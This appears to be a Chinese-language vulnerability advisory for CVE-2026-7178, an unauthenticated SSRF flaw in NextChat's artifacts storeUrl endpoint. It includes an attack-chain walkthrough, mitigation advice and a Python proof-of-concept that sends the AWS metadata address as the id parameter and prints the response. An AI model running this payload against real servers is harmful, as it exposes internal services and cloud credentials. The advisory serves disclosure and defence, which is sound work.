CVE-2026-7178 CVSS 7.3 高危

CVE-2026-7178: ChatGPTNextWeb NextChat 存在SSRF漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7178

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ChatGPTNextWeb NextChat

漏洞概述

ChatGPTNextWeb NextChat 最高至 2.16.1 版本中存在一处高危安全漏洞。该漏洞源于组件 Artifacts Endpoint 的 `app/api/artifacts/route.ts` 文件中 `storeUrl` 函数对参数 ID 处理不当。攻击者无需用户认证和交互，即可远程发起服务器端请求伪造 (SSRF) 攻击。此漏洞可能导致内网信息泄露或被利用进行进一步攻击，目前利用代码已公开，官方暂未修复。

技术细节

该漏洞的核心在于 ChatGPTNextWeb NextChat 的 Artifacts 接口实现中存在输入验证缺失。具体受影响文件为 `app/api/artifacts/route.ts`，漏洞函数为 `storeUrl`。在该函数处理请求时，直接从用户输入的 ID 参数中获取数据并将其用于发起服务器端的 HTTP 请求，而未对该参数的来源、格式或目标地址进行有效的校验和过滤。攻击者可以通过构造恶意的 HTTP 请求，将 ID 参数指定为内网地址（如 http://127.0.0.1:8080）或云服务元数据地址。由于该接口无需身份验证（PR:N）且无用户交互（UI:N），攻击者可远程利用此缺陷。服务器在解析请求后，会代为向攻击者指定的目标发送请求，从而实现 SSRF。这不仅可能导致敏感的内网服务信息泄露，还可能结合其他漏洞对内网进行横向移动。目前已有公开的利用代码验证了该攻击路径。

攻击链分析

STEP 1

侦查

攻击者识别出目标运行的是 ChatGPTNextWeb NextChat 且版本低于等于 2.16.1。

STEP 2

构造载荷

攻击者构造一个针对 `/api/artifacts/storeUrl` 接口的 HTTP POST 请求，将参数 `id` 设置为内网敏感地址（如 127.0.0.1 或云元数据地址）。

STEP 3

发送请求

攻击者向目标服务器发送恶意请求，无需经过身份验证。

STEP 4

服务端请求

目标服务器解析请求，调用 `storeUrl` 函数，并根据 `id` 参数向内网地址发起连接。

STEP 5

信息泄露

内网服务响应请求，目标服务器将响应内容返回给攻击者，造成敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-7178 PoC for ChatGPTNextWeb NextChat SSRF
# Target: storeUrl function in app/api/artifacts/route.ts

target_url = "http://target-host:3000/api/artifacts/storeUrl"
# Attempt to fetch internal metadata (e.g., AWS) or local port
internal_target = "http://169.254.169.254/latest/meta-data/" 

payload = {
    "id": internal_target
}

try:
    response = requests.post(target_url, json=payload, timeout=5)
    if response.status_code == 200:
        print("[+] SSRF Successful! Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

ChatGPTNextWeb NextChat <= 2.16.1

防御指南

临时缓解措施

建议在防火墙或 WAF 层面拦截对 `/api/artifacts/storeUrl` 接口的访问请求。或者，通过网络策略限制应用服务器的出站流量，禁止其访问内网敏感 IP 段（如 127.0.0.1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16）及元数据服务地址。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7178
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7178
3 Details https://www.cvedetails.com/cve/CVE-2026-7178/
4 VulDB https://vuldb.com/cve/CVE-2026-7178
5 Link https://gist.github.com/YLChen-007/43252d45d75e8bdd2d45136fd6ffe8a5
6 Link https://github.com/ChatGPTNextWeb/NextChat/
7 Link https://github.com/ChatGPTNextWeb/NextChat/issues/6741
8 Link https://vuldb.com/submit/797646
9 Link https://vuldb.com/vuln/359780
10 Link https://vuldb.com/vuln/359780/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表